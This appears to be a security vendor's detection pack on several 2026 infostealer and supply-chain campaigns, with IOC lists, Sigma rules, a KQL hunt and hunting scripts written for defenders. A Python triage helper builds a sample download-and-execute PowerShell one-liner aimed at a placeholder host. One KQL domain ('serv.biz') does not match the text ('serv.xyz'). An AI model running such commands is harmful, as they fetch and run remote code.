
TeamPCP PyPI Attack & Multi-Vector Infostealer Campaigns: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
April 30, 2026

Recent OTX pulses indicate a convergence of sophisticated credential theft campaigns leveraging diverse infection vectors, including software supply chain compromises, social engineering, and mobile trojans.

  • TeamPCP has weaponized the telnyx Python SDK (750k monthly downloads) via PyPI, employing steganography to hide payloads in WAV files and utilizing msbuild.exe for execution.
  • LofyStealer (GrabBot) targets gamers via a Node.js loader that deploys an in-memory C++ payload to harvest browser data.
  • GhostSocks, a GoLang-based proxy service, is partnering with Lumma Stealer to turn compromised devices into residential proxy nodes, specifically targeting the education sector.
  • ClickFix-style phishing campaigns are distributing Lumma Stealer via obfuscated PowerShell and MSI payloads using DLL sideloading.
  • KYCShadow, an Android banking trojan, is targeting Indian users through WhatsApp with fake KYC workflows to steal OTPs and credentials.

Collectively, these threats demonstrate a shift toward complex loaders (Node.js, PowerShell, MSBuild) and the abuse of legitimate developer infrastructure to bypass static defenses.

Threat Actor / Malware Profile

| Malware Family | Threat Actor | Distribution Method | Payload Behavior | C2 / Evasion |
| --- | --- | --- | --- | --- |
| TeamPCP | TeamPCP | PyPI Supply Chain (Telnyx SDK) | 3-stage: Trojanized package -> Loader -> Steganography (WAV) -> Credential Harvester | Steganography; msbuild.exe for execution; sysmon.py usage |
| LofyStealer | LofyGang | Social Engineering (Minecraft) | Node.js loader (53.5MB) + in-memory C++ payload (1.4MB); steals browser data/cookies | Syscall evasion; in-memory execution; disguised as legitimate libraries |
| GhostSocks | GhostSocks | MaaS / Underground Forums | GoLang binary; turns devices into SOCKS5 residential proxies | TLS encryption; blends into normal network traffic; partners with Lumma |
| Lumma Stealer | Unknown | ClickFix Phishing (Tech Support Scams) | HijackLoader; DLL sideloading; infostealer (logs, passwords) | Obfuscated PowerShell; renamed legitimate binaries; MSI payloads |
| KYCShadow | Unknown | WhatsApp Distribution | Fake KYC app; multi-stage dropper; WebView phishing; SMS interception | Firebase-based remote execution; VPN manipulation; native code obfuscation |

IOC Analysis

The provided indicators span multiple infrastructure types essential for C2 and payload delivery:

  • Domains & Hostnames: Several typosquatted or suspicious domains (e.g., aquasecurtiy.org, retreaw.click, serv.xyz). These should be blocked at the DNS level.
  • IP Addresses: Includes IPs associated with C2 infrastructure and payload hosting (e.g., 85.11.161.198, 24.152.36.241). These should be blocked on perimeter firewalls.
  • File Hashes: A mix of MD5, SHA1, and SHA256 hashes for loaders (Node.js), payloads (C++), and malicious installers (MSI). These are critical for EDR correlation and disk scanning.
  • URLs: Specific URLs hosting malicious payloads (e.g., http://85.11.161.198:6600/...msi). SOC teams should extract and block these URLs in secure web gateways.

Operationalization:

  • SIEM: Ingest IOC lists as watchlists.
  • EDR: Trigger isolation or full scan on hash matches.
  • Network: Blocklist the domains/IPs on the firewall and proxy.
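Applying the blocklist above to log data, as an added example that is not code from the pulses or from Security Arsenal: a Python matcher that checks proxy-log lines against the domains and IPs quoted in this section, treating subdomains of an IOC domain as hits but not look-alike names that merely end in the same characters. The "timestamp src dst url" log format and the sample lines are assumptions.

```python
"""IOC matching over proxy-log lines: an added example, not code from the pulses."""
import ipaddress
import re
from typing import Optional
from urllib.parse import urlsplit

# Domains and IPs quoted in the IOC analysis above.
IOC_DOMAINS = {"aquasecurtiy.org", "retreaw.click", "serv.xyz"}
IOC_IPS = {ipaddress.ip_address("85.11.161.198"), ipaddress.ip_address("24.152.36.241")}

# Constructed sample lines in an assumed "timestamp src dst url" proxy-log shape;
# the MSI path is a placeholder, since the pulse URL is elided on the page.
SAMPLE_LOG = """\
2026-05-01T10:00:01Z 10.0.0.5 93.184.216.34 http://example.com/index.html
2026-05-01T10:00:07Z 10.0.0.5 85.11.161.198 http://85.11.161.198:6600/PLACEHOLDER.msi
2026-05-01T10:01:13Z 10.0.0.9 203.0.113.7 https://cdn.retreaw.click/update.ps1
2026-05-01T10:02:40Z 10.0.0.9 203.0.113.8 https://notretreaw.click/index.html
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")

def domain_matches(host: str) -> Optional[str]:
    """Exact IOC domain or a subdomain of it (cdn.retreaw.click), but not a
    look-alike that merely ends in the same characters (notretreaw.click)."""
    host = host.lower().rstrip(".")
    for ioc in IOC_DOMAINS:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return None

def ip_matches(value: str) -> Optional[str]:
    # Exact IP match; hostnames and other non-IP values simply return None.
    try:
        ip = ipaddress.ip_address(value)
    except ValueError:
        return None
    return str(ip) if ip in IOC_IPS else None

def scan(log_text: str) -> list:
    """Return one hit per line whose destination IP or URL host is on the blocklist."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, dst, url = m.groups()
        host = urlsplit(url).hostname or ""
        reason = ip_matches(dst) or ip_matches(host) or domain_matches(host)
        if reason:
            hits.append({"ts": ts, "src": src, "url": url, "ioc": reason})
    return hits
```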

Detection Engineering

Sigma Rules

```yaml
---
title: Potential TeamPCP PyPI Supply Chain Attack - MSBuild Execution
description: Detects suspicious usage of msbuild.exe often associated with TeamPCP campaigns leveraging steganography and SDK exploitation.
id: 8a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5d
status: experimental
date: 2026/05/01
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/662ba0a0b1d9b3d9c0e1f2a3
tags:
  - attack.execution
  - attack.defense_evasion
  - attack.t1127.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\msbuild.exe'
    CommandLine|contains:   # any one of these in the command line
      - 'download'
      - 'http'
      - 'python'
  condition: selection
falsepositives:
  - Legitimate developer build processes
level: high
---
title: Suspicious PowerShell Encoded Command - ClickFix/Lumma Indicator
description: Detects obfuscated PowerShell commands often used in ClickFix campaigns to deliver Lumma Stealer via MSI payloads.
id: 9d0e1f2a-3b4c-5d6e-7f8a-9b0c1d2e3f4a
status: experimental
date: 2026/05/01
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/662ba0a0b1d9b3d9c0e1f2a4
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection_powershell:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_encoded:
    CommandLine|contains:   # contains is case-insensitive, so -Enc / -ENC are covered
      - ' -enc '
      - ' -encodedcommand '
      - ' -ec '
  selection_length:
    CommandLine|re: '.{200,}' # Long obfuscated strings
  condition: all of selection_*
falsepositives:
  - Legitimate system administration scripts
level: high
---
title: Node.js Loader Spawning Suspicious Processes - LofyStealer
description: Detects Node.js process spawning non-node child processes, indicative of the LofyStealer loader deploying a C++ payload.
id: 0a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5e
status: experimental
date: 2026/05/01
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/662ba0a0b1d9b3d9c0e1f2a5
tags:
  - attack.execution
  - attack.t1059
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith: '\node.exe'
  selection_child:
    Image|endswith: '.exe'
  filter_node:
    Image|contains: 'node'   # node.exe re-spawning itself (worker/cluster processes) is expected
  condition: selection_parent and selection_child and not filter_node
falsepositives:
  - Legitimate Node.js development servers
level: medium
```
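A triage companion to the encoded-PowerShell rule above, added here and not part of the pulses or the Security Arsenal rule set: it mirrors the rule's conditions (powershell/pwsh image, an encoded-command flag, command line of 200 or more characters) in Python, decodes the base64/UTF-16LE argument so an analyst can see what the obfuscation hides, and tags download-and-execute tokens. The sample events and the placeholder host are constructed.

```python
"""Triage for the encoded-PowerShell rule: an added example, not code from the pulses."""
import base64
import re
from typing import Optional

# Same flag spellings and length threshold as the Sigma rule above.
ENC_FLAG_RE = re.compile(r"\s-(?:enc|encodedcommand|ec)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
MIN_LENGTH = 200
SUSPICIOUS_TOKENS = ("downloadstring", "invoke-expression", "iex", "msiexec")

def decode_encoded_command(command_line: str) -> Optional[str]:
    """Decode the -EncodedCommand argument (base64 of UTF-16LE text); None if absent or malformed."""
    m = ENC_FLAG_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def evaluate(event: dict) -> dict:
    """Mirror the rule (powershell/pwsh image, -enc flag, >=200 chars), then decode and tag."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    rule_match = (image.endswith(("\\powershell.exe", "\\pwsh.exe"))
                  and ENC_FLAG_RE.search(cmd) is not None and len(cmd) >= MIN_LENGTH)
    decoded = decode_encoded_command(cmd) if rule_match else None
    lowered = decoded.lower() if decoded else ""
    return {"match": rule_match, "decoded": decoded,
            "indicators": [t for t in SUSPICIOUS_TOKENS if t in lowered]}

def encode_for_sample(script: str) -> str:
    """Build an -enc argument the way PowerShell expects it; used only to construct sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed samples: a ClickFix-style download-and-run one-liner against a placeholder host,
# and a short benign encoded command that stays below the rule's length threshold.
PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://invalid.example/stage.ps1')"
SAMPLE_EVENTS = [
    {"Image": PS_IMAGE, "CommandLine": "powershell.exe -enc " + encode_for_sample(SAMPLE_SCRIPT)},
    {"Image": PS_IMAGE, "CommandLine": "powershell.exe -enc " + encode_for_sample("Get-Date")},
]
```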

KQL (Microsoft Sentinel)

```kql
// Hunt for ClickFix PowerShell and Network IOCs
let IOCs = dynamic(["85.11.161.198", "24.152.36.241", "retreaw.click", "serv.biz", "aquasecurtiy.org"]);
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any ("-enc", "-encodedcommand", "DownloadString")
| extend EncodedLength = strlen(ProcessCommandLine)
| where EncodedLength > 200
| join kind=inner (
    DeviceNetworkEvents
    | where Timestamp > ago(7d)
    // has_any for URL substrings; exact match (in) for IP addresses
    | where RemoteUrl has_any (IOCs) or RemoteIP in (IOCs)
    | project DeviceId, NetworkTimestamp = Timestamp, RemoteUrl, RemoteIP
  ) on DeviceId
| project Timestamp, NetworkTimestamp, DeviceName, InitiatingProcessFileName, ProcessCommandLine, RemoteUrl, RemoteIP
```

PowerShell Hunt Script

```powershell
<#
.SYNOPSIS
    IOC Hunt Script for TeamPCP, LofyStealer, and Lumma Stealer.
.DESCRIPTION
    Scans specific directories for known malicious file hashes provided in OTX pulses.
    Get-FileHash returns uppercase hex and -in compares case-insensitively, so the
    lowercase hash list below matches as-is.
#>

$TargetHashes = @(
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
    "8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2",
    "d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
    "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7",
    "f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc",
    "c529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728"
)

$SearchPaths = @("$env:USERPROFILE\AppData", "$env:TEMP", "C:\ProgramData", "$env:PROGRAMFILES")

Write-Host "[+] Starting IOC Hunt for OTX Pulses (2026-05-01)..." -ForegroundColor Cyan

foreach ($Path in $SearchPaths) {
    if (Test-Path $Path) {
        Write-Host "[*] Scanning $Path..." -ForegroundColor Yellow
        # -File skips directories (which cannot be hashed); -Force includes hidden files
        Get-ChildItem -Path $Path -Recurse -File -Force -ErrorAction SilentlyContinue | ForEach-Object {
            $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($Hash -and ($Hash -in $TargetHashes)) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
                Write-Host "    SHA256: $Hash" -ForegroundColor Red
            }
        }
    }
}
Write-Host "[+] Scan complete." -ForegroundColor Cyan
```


# Response Priorities

*   **Immediate**:
    *   Block all identified IOCs (IPs, Domains, URLs) at the firewall and proxy level.
    *   Isolate endpoints with positive hash matches for TeamPCP or LofyStealer.
    *   Hunt for `msbuild.exe` spawning from non-standard parent processes.

*   **24 Hours**:
    *   Conduct credential audits and forced password resets for accounts accessed from devices flagged by GhostSocks proxy indicators.
    *   Review authentication logs for anomalies originating from the geo-locations associated with KYCShadow targeting.
    *   Audit Python environments (`pip list`) for the malicious `telnyx` package versions.

*   **1 Week**:
    *   Implement software supply chain controls (SBOM verification) for internal development teams using PyPI.
    *   Harden browser policies to restrict extension installs (mitigating LofyStealer vectors).
    *   Deploy application control policies to block unsigned Node.js loaders and MSI downloads from the internet.
